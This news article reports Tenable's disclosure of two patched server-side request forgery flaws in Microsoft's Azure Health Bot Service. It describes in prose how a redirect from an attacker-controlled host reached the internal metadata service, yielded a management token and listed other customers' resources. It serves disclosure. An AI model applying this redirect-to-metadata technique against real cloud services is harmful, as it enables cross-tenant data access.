Severe vulnerabilities have been discovered in Microsoft’s AI healthcare chatbot service, allowing access to user and customer information, according to Tenable researchers.
The level of access granted by the vulnerabilities to the Azure Health Bot Service, one of which is rated critical, means it is likely that lateral movement to other resources was possible.
Microsoft has applied mitigations for the discovered vulnerabilities, with no customer action required.
Microsoft AI Chatbot Exploited
The Azure Health Bot Service is a cloud platform that enables healthcare organizations to build and deploy AI-powered virtual assistants to reduce costs and improve efficiency.
While analyzing the service for security issues, Tenable researchers focused on a feature called ‘Data Connections’, which allows bots to interact with external data sources to retrieve information from other services that the provider may be using, such as a portal for patient information.
This data connection feature is designed to allow the service’s backend to make requests to third-party APIs.
While testing these connections to see if they could interact with endpoints internal to the service, the researchers found that issuing redirect responses enabled them to bypass mitigations, such as filtering, on these endpoints.
Two privilege escalation vulnerabilities were uncovered as part of this process.
Critical Privilege Escalation Vulnerability
The first vulnerability detailed by Tenable was a privilege escalation issue exploited by via a server-side request forgery, assigned a CVE number CVE-2024-38109.
The researchers configured a data connection within Azure’s Internal Metadata Service (IMDS) scenario editor to specify and external host under their control.
The researchers then configured this external host to respond to requests with a 301 redirect response destined for IMDS.
After receiving a valid metadata response, the researchers were able to obtain an access token for management.azure.com. This token enabled them to list the subscriptions they had access to via a call to https://management.azure.com/subscriptions?api-version=2020-01-01, which provided them with a subscription ID internal to Microsoft.
Tenable researchers could then list he resources they had access to via https://management.azure.com/subscriptions/<REDACTED>/resources?api-version=2020-10-01, which contained hundreds of resources belonging to other customers.
The findings were reported to Microsoft on June 17, 2024, and within a week, fixes were introduced into affected environments. By July 2, fixes were rolled out across all regions.
The fix for this flaw involved rejecting redirect status codes altogether for data connection endpoints, which eliminated this attack vector.
Microsoft has assigned this vulnerability a severity rating of Critical, confirming it would provide cross tenant access. It has been included in Microsoft’s August 2024 Patch Tuesday publication.
There is no evidence that the issue was exploited by a malicious actor.
Important Privilege Escalation Vulnerability
After Microsoft fixed the first vulnerability, Tenable researchers found another privilege escalation vulnerability contained in the Data Connections feature of the Azure Health Bot Service.
The researchers used a similar server-side request forgery technique to exploit the flaw, contained in the FHIR endpoint vector, which prescribes a format for accessing electronic medical records resources and actions on the resources.
This vulnerability was less severe than the IMDS flaw, as it did not provide cross tenant access.
The flaw was reported to Microsoft on July 9, with fixes made available by July 12. The vulnerability has been rated as Important.
There is no evidence that the issue was exploited by malicious actors.
Prioritizing Security in AI Models
The privilege escalation flaws relate to the underlying architecture of the AI chatbot service rather than the AI models themselves, the researchers noted.
Tenable said that the discoveries highlight the continued importance of traditional web application and cloud security mechanisms for AI-powered services.
Read now: 70% of Businesses Prioritize Innovation Over Security in Generative AI Projects
In February 2024, Mozilla found that AI-powered “relationship” chatbots are deliberately ignoring privacy and security best practices.